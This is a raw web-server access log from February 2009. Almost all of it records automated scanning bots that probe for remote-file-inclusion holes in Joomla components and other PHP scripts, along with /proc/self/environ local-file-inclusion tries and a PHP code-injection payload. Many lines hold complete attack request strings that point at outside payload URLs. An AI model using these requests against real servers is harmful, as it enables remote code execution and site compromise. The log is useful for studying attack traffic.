84.21.71.133 - - [04/Feb/2009:19:14:38 -0600] "GET /logs/access_log.1206230400//include.php?path[docroot]=http://champrond-en-gatine.org//administrator/components/com_joomla-visites/core/include/updates/v6id.txt?????? HTTP/1.1" 404 323 "-""libwww-perl/5.805"
209.172.33.230 - - [04/Feb/2009:19:14:42 -0600] "GET /logs/access_log.1214784000//include/footer.php?_path[counter]=http://mixcom.ru/pic/banner.swf?? HTTP/1.1" 404 330 "-""Mozilla/5.0"
209.172.33.230 - - [04/Feb/2009:19:15:45 -0600] "GET /logs/access_log.1211328000//include/footer.php?_path[counter]=http://mixcom.ru/pic/banner.swf?? HTTP/1.1" 404 330 "-""Mozilla/5.0"
209.172.33.230 - - [04/Feb/2009:19:15:45 -0600] "GET /logs/access_log.1213660800//include/footer.php?_path[counter]=http://mixcom.ru/pic/banner.swf?? HTTP/1.1" 404 330 "-""Mozilla/5.0"
132.248.117.152 - - [04/Feb/2009:19:15:47 -0600] "GET /logs/access_log.1215216000/errors.php?error=http://www.apoe.at/cache/chi.txt?? HTTP/1.1" 404 321 "-""libwww-perl/5.805"
132.248.117.152 - - [04/Feb/2009:19:15:47 -0600] "GET /errors.php?error=http://www.apoe.at/cache/chi.txt?? HTTP/1.1" 404 294 "-""libwww-perl/5.805"
132.248.117.152 - - [04/Feb/2009:19:15:47 -0600] "GET /logs/errors.php?error=http://www.apoe.at/cache/chi.txt?? HTTP/1.1" 404 299 "-""libwww-perl/5.805"
66.34.133.35 - - [04/Feb/2009:19:19:14 -0600] "GET /logs/access_log.1210982400//include/footer.php?_path[counter]=http://mixcom.ru/pic/banner.swf?? HTTP/1.1" 404 330 "-""Mozilla/5.0"
84.21.71.133 - - [04/Feb/2009:19:19:34 -0600] "GET /logs/access_log.1212364800%20//include.php?path[docroot]=http://champrond-en-gatine.org//administrator/components/com_joomla-visites/core/include/updates/v6id.txt?????? HTTP/1.1" 404 324 "-""libwww-perl/5.805"
84.21.71.133 - - [04/Feb/2009:19:19:38 -0600] "GET /logs/access_log.1206403200%20//include.php?path[docroot]=http://champrond-en-gatine.org//administrator/components/com_joomla-visites/core/include/updates/v6id.txt?????? HTTP/1.1" 404 324 "-""libwww-perl/5.805"
84.21.71.133 - - [04/Feb/2009:19:19:38 -0600] "GET /logs/access_log.1206230400%20//include.php?path[docroot]=http://champrond-en-gatine.org//administrator/components/com_joomla-visites/core/include/updates/v6id.txt?????? HTTP/1.1" 404 324 "-""libwww-perl/5.805"
77.221.130.27 - - [04/Feb/2009:19:20:39 -0600] "GET /index.php?base=/proc/self/environ%00 HTTP/1.1" 404 293 "-""Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)"
77.221.130.27 - - [04/Feb/2009:19:20:39 -0600] "GET /logs/index.php?base=/proc/self/environ%00 HTTP/1.1" 404 298 "-""MOT-MPx220/1.400 Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Smartphone;"
85.204.231.202 - - [04/Feb/2009:19:21:56 -0600] "GET /logs/access_log.1211673600//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://relativ76.altervista.org/robots.txt?? HTTP/1.1" 404 324 "-""libwww-perl/5.803"
85.204.231.202 - - [04/Feb/2009:19:22:00 -0600] "GET //comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://relativ76.altervista.org/robots.txt?? HTTP/1.1" 404 297 "-""libwww-perl/5.803"
85.204.231.202 - - [04/Feb/2009:19:22:03 -0600] "GET /logs//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://relativ76.altervista.org/robots.txt?? HTTP/1.1" 404 302 "-""libwww-perl/5.803"
216.55.156.86 - - [04/Feb/2009:19:22:56 -0600] "GET /logs/access_log.1217980800/xmlrpcs.php? HTTP/1.1" 404 322 "-""libwww-perl/5.803"
216.55.156.86 - - [04/Feb/2009:19:22:56 -0600] "GET /xmlrpcs.php? HTTP/1.1" 404 295 "-""libwww-perl/5.803"
216.55.156.86 - - [04/Feb/2009:19:22:56 -0600] "GET /logs/xmlrpcs.php? HTTP/1.1" 404 300 "-""libwww-perl/5.803"
66.34.133.35 - - [04/Feb/2009:19:23:35 -0600] "GET /logs/access_log.1214784000//include/footer.php?_path[counter]=http://mixcom.ru/pic/banner.swf?? HTTP/1.1" 404 330 "-""Mozilla/5.0"
93.190.137.242 - - [04/Feb/2009:19:23:42 -0600] "GET /logs/access_log.1216512000%20%20/components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.mirdruzey.ru/assets/snippets/jot/id1.txt?? HTTP/1.1" 404 359 "-""Mozilla/5.0"
93.190.137.242 - - [04/Feb/2009:19:23:43 -0600] "GET /logs/access_log.1211068800%20%20/components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.mirdruzey.ru/assets/snippets/jot/id1.txt?? HTTP/1.1" 404 359 "-""Mozilla/5.0"
77.221.130.27 - - [04/Feb/2009:19:24:13 -0600] "GET /index.php?basepath=/proc/self/environ%00 HTTP/1.1" 404 293 "-""Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)"
77.221.130.27 - - [04/Feb/2009:19:24:17 -0600] "GET /logs/index.php?basepath=/proc/self/environ%00 HTTP/1.1" 404 298 "-""Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)"
66.34.133.35 - - [04/Feb/2009:19:24:39 -0600] "GET /logs/access_log.1211328000//include/footer.php?_path[counter]=http://mixcom.ru/pic/banner.swf?? HTTP/1.1" 404 330 "-""Mozilla/5.0"
66.34.133.35 - - [04/Feb/2009:19:24:47 -0600] "GET /logs/access_log.1213660800//include/footer.php?_path[counter]=http://mixcom.ru/pic/banner.swf?? HTTP/1.1" 404 330 "-""Mozilla/5.0"
78.137.163.133 - - [04/Feb/2009:19:25:18 -0600] "GET /robots.txt HTTP/1.1" 404 294 "-""-"
78.137.163.133 - - [04/Feb/2009:19:25:18 -0600] "GET /costume/ HTTP/1.1" 200 640 "-""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9a1) Gecko/20070308 Minefield/3.0a1"
93.190.137.242 - - [04/Feb/2009:19:26:43 -0600] "GET /logs/access_log.1216425600/components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.mirdruzey.ru/assets/snippets/jot/id1.txt?? HTTP/1.1" 404 357 "-""Mozilla/5.0"
64.13.249.26 - - [04/Feb/2009:19:29:45 -0600] "GET /logs/access_log.1217203200/!scanhttp://f-y-p.nl/ids.txt?? HTTP/1.1" 404 339 "-""libwww-perl/5.79"
64.13.249.26 - - [04/Feb/2009:19:29:45 -0600] "GET /!scanhttp://f-y-p.nl/ids.txt?? HTTP/1.1" 404 312 "-""libwww-perl/5.79"
64.13.249.26 - - [04/Feb/2009:19:29:45 -0600] "GET /logs/!scanhttp://f-y-p.nl/ids.txt?? HTTP/1.1" 404 317 "-""libwww-perl/5.79"
64.13.249.26 - - [04/Feb/2009:19:29:47 -0600] "GET /logs/!scanhttp://f-y-p.nl/ids.txt?? HTTP/1.1" 404 317 "-""libwww-perl/5.79"
64.13.249.26 - - [04/Feb/2009:19:29:47 -0600] "GET /!scanhttp://f-y-p.nl/ids.txt?? HTTP/1.1" 404 312 "-""libwww-perl/5.79"
82.194.72.142 - - [04/Feb/2009:19:30:32 -0600] "GET /logs/access_log.1216684800//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://203.114.112.155/webboard1234/mic.txt? HTTP/1.1" 404 348 "-""libwww-perl/5.803"
82.194.72.142 - - [04/Feb/2009:19:30:32 -0600] "GET //ktmllite/includes/ktedit/toolbar.php?dirDepth=http://203.114.112.155/webboard1234/mic.txt? HTTP/1.1" 404 321 "-""libwww-perl/5.803"
82.194.72.142 - - [04/Feb/2009:19:30:32 -0600] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://203.114.112.155/webboard1234/mic.txt? HTTP/1.1" 404 326 "-""libwww-perl/5.803"
88.191.95.106 - - [04/Feb/2009:19:30:33 -0600] "GET /logs/access_log.1219536000//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://gumansin.com/id.txt?? HTTP/1.1" 404 346 "-""Mozilla/5.0"
88.191.95.106 - - [04/Feb/2009:19:32:01 -0600] "GET /logs/access_log.1216944000//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://gumansin.com/id.txt?? HTTP/1.1" 404 346 "-""Mozilla/5.0"
64.13.249.26 - - [04/Feb/2009:19:32:21 -0600] "GET /logs/access_log.1214784000/!scanhttp://f-y-p.nl/ids.txt?? HTTP/1.1" 404 339 "-""libwww-perl/5.79"
77.221.130.21 - - [04/Feb/2009:19:34:24 -0600] "GET /logs/access_log.1217289600//errors.php?error=http://www.tpshanshui.com.tw/alat/id2.txt?? HTTP/1.1" 404 322 "-""Mozilla/5.0"
77.221.130.21 - - [04/Feb/2009:19:34:24 -0600] "GET /logs/access_log.1217548800//errors.php?error=http://www.tpshanshui.com.tw/alat/id2.txt?? HTTP/1.1" 404 322 "-""Mozilla/5.0"
77.221.130.21 - - [04/Feb/2009:19:34:56 -0600] "GET /logs/access_log.1217289600//errors.php?error=http://www.tpshanshui.com.tw/alat/id2.txt?? HTTP/1.1" 404 322 "-""Mozilla/5.0"
77.221.130.21 - - [04/Feb/2009:19:35:01 -0600] "GET /logs/access_log.1217548800//errors.php?error=http://www.tpshanshui.com.tw/alat/id2.txt?? HTTP/1.1" 404 322 "-""Mozilla/5.0"
82.194.72.142 - - [04/Feb/2009:19:35:37 -0600] "GET /logs/access_log.1215907200//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://203.114.112.155/webboard1234/mic.txt? HTTP/1.1" 404 348 "-""libwww-perl/5.803"
67.195.37.166 - - [04/Feb/2009:19:38:12 -0600] "GET /robots.txt HTTP/1.0" 404 282 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
67.195.37.166 - - [04/Feb/2009:19:38:13 -0600] "GET / HTTP/1.0" 200 1231 "-""Mozilla/5.0 (compatible; Yahoo! DE Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
79.174.72.67 - - [04/Feb/2009:19:40:45 -0600] "GET /logs/access_log.1213660800//index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://relativ76.altervista.org/robots.txt?? HTTP/1.1" 404 321 "-""libwww-perl/5.805"
79.174.72.67 - - [04/Feb/2009:19:40:45 -0600] "GET //index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://relativ76.altervista.org/robots.txt?? HTTP/1.1" 404 294 "-""libwww-perl/5.805"
79.174.72.67 - - [04/Feb/2009:19:40:46 -0600] "GET /logs//index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://relativ76.altervista.org/robots.txt?? HTTP/1.1" 404 299 "-""libwww-perl/5.805"
77.221.130.14 - - [04/Feb/2009:19:40:55 -0600] "GET /logs/access_log.1214179200/components/com_performs/performs.php?mosConfig_absolute_path=http://www.lazar.ru/manager/processors/copyright.txt??? HTTP/1.1" 404 347 "-""libwww-perl/5.805"
77.221.130.14 - - [04/Feb/2009:19:40:55 -0600] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://www.lazar.ru/manager/processors/copyright.txt??? HTTP/1.1" 404 320 "-""libwww-perl/5.805"
77.221.130.14 - - [04/Feb/2009:19:40:56 -0600] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://www.lazar.ru/manager/processors/copyright.txt??? HTTP/1.1" 404 325 "-""libwww-perl/5.805"
77.221.130.14 - - [04/Feb/2009:19:42:48 -0600] "GET /logs/access_log.1210896000/components/com_performs/performs.php?mosConfig_absolute_path=http://www.lazar.ru/manager/processors/copyright.txt??? HTTP/1.1" 404 347 "-""libwww-perl/5.805"
113.130.70.19 - - [04/Feb/2009:19:43:39 -0600] "GET //login.php?dir=http://diegofire.t35.com/id01.txt??? HTTP/1.1" 404 294 "-""Mozilla/5.0"
113.130.70.19 - - [04/Feb/2009:19:43:39 -0600] "GET /logs//login.php?dir=http://diegofire.t35.com/id01.txt??? HTTP/1.1" 404 299 "-""Mozilla/5.0"
113.130.70.19 - - [04/Feb/2009:19:43:39 -0600] "GET /logs/access_log.1216080000//login.php?dir=http://diegofire.t35.com/id01.txt??? HTTP/1.1" 404 321 "-""Mozilla/5.0"
113.130.70.19 - - [04/Feb/2009:19:43:39 -0600] "GET /logs/access_log.1206230400//login.php?dir=http://diegofire.t35.com/id01.txt??? HTTP/1.1" 404 321 "-""Mozilla/5.0"
113.130.70.19 - - [04/Feb/2009:19:44:17 -0600] "GET /index.php?go=http://diegofire.t35.com/id01.txt??? HTTP/1.1" 404 293 "-""Mozilla/5.0"
113.130.70.19 - - [04/Feb/2009:19:44:17 -0600] "GET /logs/index.php?go=http://diegofire.t35.com/id01.txt??? HTTP/1.1" 404 298 "-""Mozilla/5.0"
113.130.70.19 - - [04/Feb/2009:19:44:17 -0600] "GET /logs/access_log.1218758400%20%20/index.php?go=http://diegofire.t35.com/id01.txt??? HTTP/1.1" 404 322 "-""Mozilla/5.0"
216.22.26.95 - - [04/Feb/2009:19:44:59 -0600] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://h1.ripway.com/matamune/copyright.txt???? HTTP/1.1" 404 338 "-""Mozilla/5.0"
216.22.26.95 - - [04/Feb/2009:19:44:59 -0600] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://h1.ripway.com/matamune/copyright.txt???? HTTP/1.1" 404 343 "-""Mozilla/5.0"
216.22.26.95 - - [04/Feb/2009:19:44:59 -0600] "GET /logs/access_log.1212278400//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://h1.ripway.com/matamune/copyright.txt???? HTTP/1.1" 404 365 "-""Mozilla/5.0"
216.22.26.95 - - [04/Feb/2009:19:45:04 -0600] "GET /logs/access_log.1212278400//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://h1.ripway.com/matamune/copyright.txt???? HTTP/1.1" 404 365 "-""Mozilla/5.0"
216.22.26.95 - - [04/Feb/2009:19:45:04 -0600] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://h1.ripway.com/matamune/copyright.txt???? HTTP/1.1" 404 343 "-""Mozilla/5.0"
216.22.26.95 - - [04/Feb/2009:19:45:04 -0600] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://h1.ripway.com/matamune/copyright.txt???? HTTP/1.1" 404 338 "-""Mozilla/5.0"
216.22.26.95 - - [04/Feb/2009:19:45:04 -0600] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://h1.ripway.com/matamune/copyright.txt???? HTTP/1.1" 404 338 "-""Mozilla/5.0"
216.22.26.95 - - [04/Feb/2009:19:45:04 -0600] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://h1.ripway.com/matamune/copyright.txt???? HTTP/1.1" 404 343 "-""Mozilla/5.0"
216.22.26.95 - - [04/Feb/2009:19:45:04 -0600] "GET /logs/access_log.1212278400%20%20//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://h1.ripway.com/matamune/copyright.txt???? HTTP/1.1" 404 367 "-""Mozilla/5.0"
216.22.26.95 - - [04/Feb/2009:19:45:07 -0600] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://h1.ripway.com/matamune/copyright.txt???? HTTP/1.1" 404 338 "-""Mozilla/5.0"
216.22.26.95 - - [04/Feb/2009:19:45:07 -0600] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://h1.ripway.com/matamune/copyright.txt???? HTTP/1.1" 404 343 "-""Mozilla/5.0"
216.22.26.95 - - [04/Feb/2009:19:45:07 -0600] "GET /logs/access_log.1212278400%20%20//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://h1.ripway.com/matamune/copyright.txt???? HTTP/1.1" 404 367 "-""Mozilla/5.0"
216.22.26.95 - - [04/Feb/2009:19:45:08 -0600] "GET /logs/access_log.1216944000//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://h1.ripway.com/matamune/copyright.txt???? HTTP/1.1" 404 365 "-""Mozilla/5.0"
113.130.70.19 - - [04/Feb/2009:19:45:13 -0600] "GET /logs/access_log.1206230400%20%20//login.php?dir=http://diegofire.t35.com/id01.txt??? HTTP/1.1" 404 323 "-""Mozilla/5.0"
113.130.70.19 - - [04/Feb/2009:19:45:13 -0600] "GET /logs/access_log.1216080000%20%20//login.php?dir=http://diegofire.t35.com/id01.txt??? HTTP/1.1" 404 323 "-""Mozilla/5.0"
216.22.26.95 - - [04/Feb/2009:19:45:17 -0600] "GET /logs/access_log.1216944000%20%20//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://h1.ripway.com/matamune/copyright.txt???? HTTP/1.1" 404 367 "-""Mozilla/5.0"
216.22.26.95 - - [04/Feb/2009:19:45:18 -0600] "GET /logs/access_log.1216944000//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://h1.ripway.com/matamune/copyright.txt???? HTTP/1.1" 404 365 "-""Mozilla/5.0"
216.22.26.95 - - [04/Feb/2009:19:45:19 -0600] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://h1.ripway.com/matamune/copyright.txt???? HTTP/1.1" 404 338 "-""Mozilla/5.0"
216.22.26.95 - - [04/Feb/2009:19:45:20 -0600] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://h1.ripway.com/matamune/copyright.txt???? HTTP/1.1" 404 343 "-""Mozilla/5.0"
216.22.26.95 - - [04/Feb/2009:19:45:20 -0600] "GET /logs/access_log.1212278400//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://h1.ripway.com/matamune/copyright.txt???? HTTP/1.1" 404 365 "-""Mozilla/5.0"
216.22.26.95 - - [04/Feb/2009:19:45:20 -0600] "GET /logs/access_log.1216944000%20%20//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://h1.ripway.com/matamune/copyright.txt???? HTTP/1.1" 404 367 "-""Mozilla/5.0"
216.22.26.95 - - [04/Feb/2009:19:45:23 -0600] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://h1.ripway.com/matamune/copyright.txt???? HTTP/1.1" 404 338 "-""Mozilla/5.0"
216.22.26.95 - - [04/Feb/2009:19:45:23 -0600] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://h1.ripway.com/matamune/copyright.txt???? HTTP/1.1" 404 343 "-""Mozilla/5.0"
216.22.26.95 - - [04/Feb/2009:19:45:23 -0600] "GET /logs/access_log.1212278400//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://h1.ripway.com/matamune/copyright.txt???? HTTP/1.1" 404 365 "-""Mozilla/5.0"
216.22.26.95 - - [04/Feb/2009:19:45:24 -0600] "GET /logs/access_log.1216944000//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://h1.ripway.com/matamune/copyright.txt???? HTTP/1.1" 404 365 "-""Mozilla/5.0"
216.22.26.95 - - [04/Feb/2009:19:45:27 -0600] "GET /logs/access_log.1216944000//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://h1.ripway.com/matamune/copyright.txt???? HTTP/1.1" 404 365 "-""Mozilla/5.0"
200.13.253.154 - - [04/Feb/2009:19:45:53 -0600] "GET /logs//components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://www.kazandoska.ru/id.txt?? HTTP/1.1" 404 346 "-""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
216.22.26.95 - - [04/Feb/2009:19:46:08 -0600] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://h1.ripway.com/matamune/copyright.txt???? HTTP/1.1" 404 338 "-""Mozilla/5.0"
216.22.26.95 - - [04/Feb/2009:19:46:08 -0600] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://h1.ripway.com/matamune/copyright.txt???? HTTP/1.1" 404 343 "-""Mozilla/5.0"
216.22.26.95 - - [04/Feb/2009:19:46:08 -0600] "GET /logs/access_log.1212278400//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://h1.ripway.com/matamune/copyright.txt???? HTTP/1.1" 404 365 "-""Mozilla/5.0"
216.22.26.95 - - [04/Feb/2009:19:46:12 -0600] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://h1.ripway.com/matamune/copyright.txt???? HTTP/1.1" 404 338 "-""Mozilla/5.0"
216.22.26.95 - - [04/Feb/2009:19:46:12 -0600] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://h1.ripway.com/matamune/copyright.txt???? HTTP/1.1" 404 343 "-""Mozilla/5.0"
216.22.26.95 - - [04/Feb/2009:19:46:12 -0600] "GET /logs/access_log.1212278400//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://h1.ripway.com/matamune/copyright.txt???? HTTP/1.1" 404 365 "-""Mozilla/5.0"
216.22.26.95 - - [04/Feb/2009:19:46:20 -0600] "GET /logs/access_log.1216944000//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://h1.ripway.com/matamune/copyright.txt???? HTTP/1.1" 404 365 "-""Mozilla/5.0"
216.22.26.95 - - [04/Feb/2009:19:46:24 -0600] "GET /logs/access_log.1216944000//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://h1.ripway.com/matamune/copyright.txt???? HTTP/1.1" 404 365 "-""Mozilla/5.0"
89.111.173.113 - - [04/Feb/2009:19:46:48 -0600] "GET /logs/access_log.1219536000//admin/includes/spaw/spaw_control.class.php?spaw_root=http://relativ76.altervista.org/robots.txt?? HTTP/1.1" 404 354 "-""libwww-perl/5.805"
89.111.173.113 - - [04/Feb/2009:19:46:49 -0600] "GET //admin/includes/spaw/spaw_control.class.php?spaw_root=http://relativ76.altervista.org/robots.txt?? HTTP/1.1" 404 327 "-""libwww-perl/5.805"
89.111.173.113 - - [04/Feb/2009:19:46:50 -0600] "GET /logs//admin/includes/spaw/spaw_control.class.php?spaw_root=http://relativ76.altervista.org/robots.txt?? HTTP/1.1" 404 332 "-""libwww-perl/5.805"
216.22.26.95 - - [04/Feb/2009:19:48:03 -0600] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://h1.ripway.com/matamune/copyright.txt???? HTTP/1.1" 404 338 "-""Mozilla/5.0"
216.22.26.95 - - [04/Feb/2009:19:48:03 -0600] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://h1.ripway.com/matamune/copyright.txt???? HTTP/1.1" 404 343 "-""Mozilla/5.0"
216.22.26.95 - - [04/Feb/2009:19:48:03 -0600] "GET /logs/access_log.1214092800//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://h1.ripway.com/matamune/copyright.txt???? HTTP/1.1" 404 365 "-""Mozilla/5.0"
216.22.26.95 - - [04/Feb/2009:19:48:04 -0600] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://h1.ripway.com/matamune/copyright.txt???? HTTP/1.1" 404 338 "-""Mozilla/5.0"
216.22.26.95 - - [04/Feb/2009:19:48:04 -0600] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://h1.ripway.com/matamune/copyright.txt???? HTTP/1.1" 404 343 "-""Mozilla/5.0"
216.22.26.95 - - [04/Feb/2009:19:48:04 -0600] "GET /logs/access_log.1214092800//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://h1.ripway.com/matamune/copyright.txt???? HTTP/1.1" 404 365 "-""Mozilla/5.0"
216.22.26.95 - - [04/Feb/2009:19:48:08 -0600] "GET /logs/access_log.1214956800//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://h1.ripway.com/matamune/copyright.txt???? HTTP/1.1" 404 365 "-""Mozilla/5.0"
216.22.26.95 - - [04/Feb/2009:19:48:13 -0600] "GET /logs/access_log.1214956800//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://h1.ripway.com/matamune/copyright.txt???? HTTP/1.1" 404 365 "-""Mozilla/5.0"
211.115.222.220 - - [04/Feb/2009:19:48:56 -0600] "GET /logs/access_log.1216944000//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.scv.co.kr/zboard/info.txt???? HTTP/1.1" 404 355 "-""libwww-perl/5.801"
211.115.222.220 - - [04/Feb/2009:19:48:56 -0600] "GET //components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.scv.co.kr/zboard/info.txt???? HTTP/1.1" 404 328 "-""libwww-perl/5.801"
211.115.222.220 - - [04/Feb/2009:19:48:56 -0600] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.scv.co.kr/zboard/info.txt???? HTTP/1.1" 404 333 "-""libwww-perl/5.801"
89.111.173.113 - - [04/Feb/2009:19:51:53 -0600] "GET /logs/access_log.1218758400//admin/includes/spaw/spaw_control.class.php?spaw_root=http://relativ76.altervista.org/robots.txt?? HTTP/1.1" 404 354 "-""libwww-perl/5.805"
113.130.70.19 - - [04/Feb/2009:19:51:57 -0600] "GET /logs/access_log.1218758400/index.php?go=http://diegofire.t35.com/id01.txt??? HTTP/1.1" 404 320 "-""Mozilla/5.0"
113.130.70.19 - - [04/Feb/2009:19:52:10 -0600] "GET /logs/access_log.1208304000//login.php?dir=http://diegofire.t35.com/id01.txt??? HTTP/1.1" 404 321 "-""Mozilla/5.0"
113.130.70.19 - - [04/Feb/2009:19:52:15 -0600] "GET /logs/access_log.1214092800//login.php?dir=http://diegofire.t35.com/id01.txt??? HTTP/1.1" 404 321 "-""Mozilla/5.0"
77.221.130.27 - - [04/Feb/2009:19:52:19 -0600] "GET /logs/index.php?channel=/proc/self/environ%00 HTTP/1.1" 404 298 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
77.221.130.27 - - [04/Feb/2009:19:52:19 -0600] "GET /index.php?channel=/proc/self/environ%00 HTTP/1.1" 404 293 "-""Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox"
200.13.253.154 - - [04/Feb/2009:19:52:35 -0600] "GET /logs//main.php?sayfa=http://okto.co.kr//idxx.txt?? HTTP/1.1" 404 298 "-""Mozilla/5.0"
200.13.253.154 - - [04/Feb/2009:19:52:35 -0600] "GET //main.php?sayfa=http://okto.co.kr//idxx.txt?? HTTP/1.1" 404 293 "-""Mozilla/5.0"
147.213.65.178 - - [04/Feb/2009:19:54:20 -0600] "GET /logs/access_log.1212278400//skin/zero_vote/ask_password.php?dir=http://madrigaldelavera.es/joomla/mambots/editors/idit.txt?? HTTP/1.1" 404 343 "-""libwww-perl/5.803"
147.213.65.178 - - [04/Feb/2009:19:54:21 -0600] "GET //skin/zero_vote/ask_password.php?dir=http://madrigaldelavera.es/joomla/mambots/editors/idit.txt?? HTTP/1.1" 404 316 "-""libwww-perl/5.803"
147.213.65.178 - - [04/Feb/2009:19:54:21 -0600] "GET /logs//skin/zero_vote/ask_password.php?dir=http://madrigaldelavera.es/joomla/mambots/editors/idit.txt?? HTTP/1.1" 404 321 "-""libwww-perl/5.803"
200.13.253.154 - - [04/Feb/2009:19:55:57 -0600] "GET /logs/access_log.1225584000//main.php?sayfa=http://okto.co.kr//idxx.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
79.174.72.67 - - [04/Feb/2009:19:57:26 -0600] "GET /logs/access_log.1214179200//index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://relativ76.altervista.org/robots.txt?? HTTP/1.1" 404 321 "-""libwww-perl/5.805"
213.136.106.214 - - [04/Feb/2009:19:59:01 -0600] "GET /logs/access_log.1217548800/index.php?_SERVER[DOCUMENT_ROOT]=http://jeticu.com/ktmlpro/includes/ktedit/web.txt???? HTTP/1.1" 404 320 "-""libwww-perl/5.65"
213.136.106.214 - - [04/Feb/2009:19:59:02 -0600] "GET /index.php?_SERVER[DOCUMENT_ROOT]=http://jeticu.com/ktmlpro/includes/ktedit/web.txt???? HTTP/1.1" 404 293 "-""libwww-perl/5.65"
213.136.106.214 - - [04/Feb/2009:19:59:02 -0600] "GET /logs/index.php?_SERVER[DOCUMENT_ROOT]=http://jeticu.com/ktmlpro/includes/ktedit/web.txt???? HTTP/1.1" 404 298 "-""libwww-perl/5.65"
213.136.106.214 - - [04/Feb/2009:19:59:03 -0600] "GET /logs/access_log.1219968000/index.php?_SERVER[DOCUMENT_ROOT]=http://jeticu.com/ktmlpro/includes/ktedit/web.txt???? HTTP/1.1" 404 320 "-""libwww-perl/5.65"
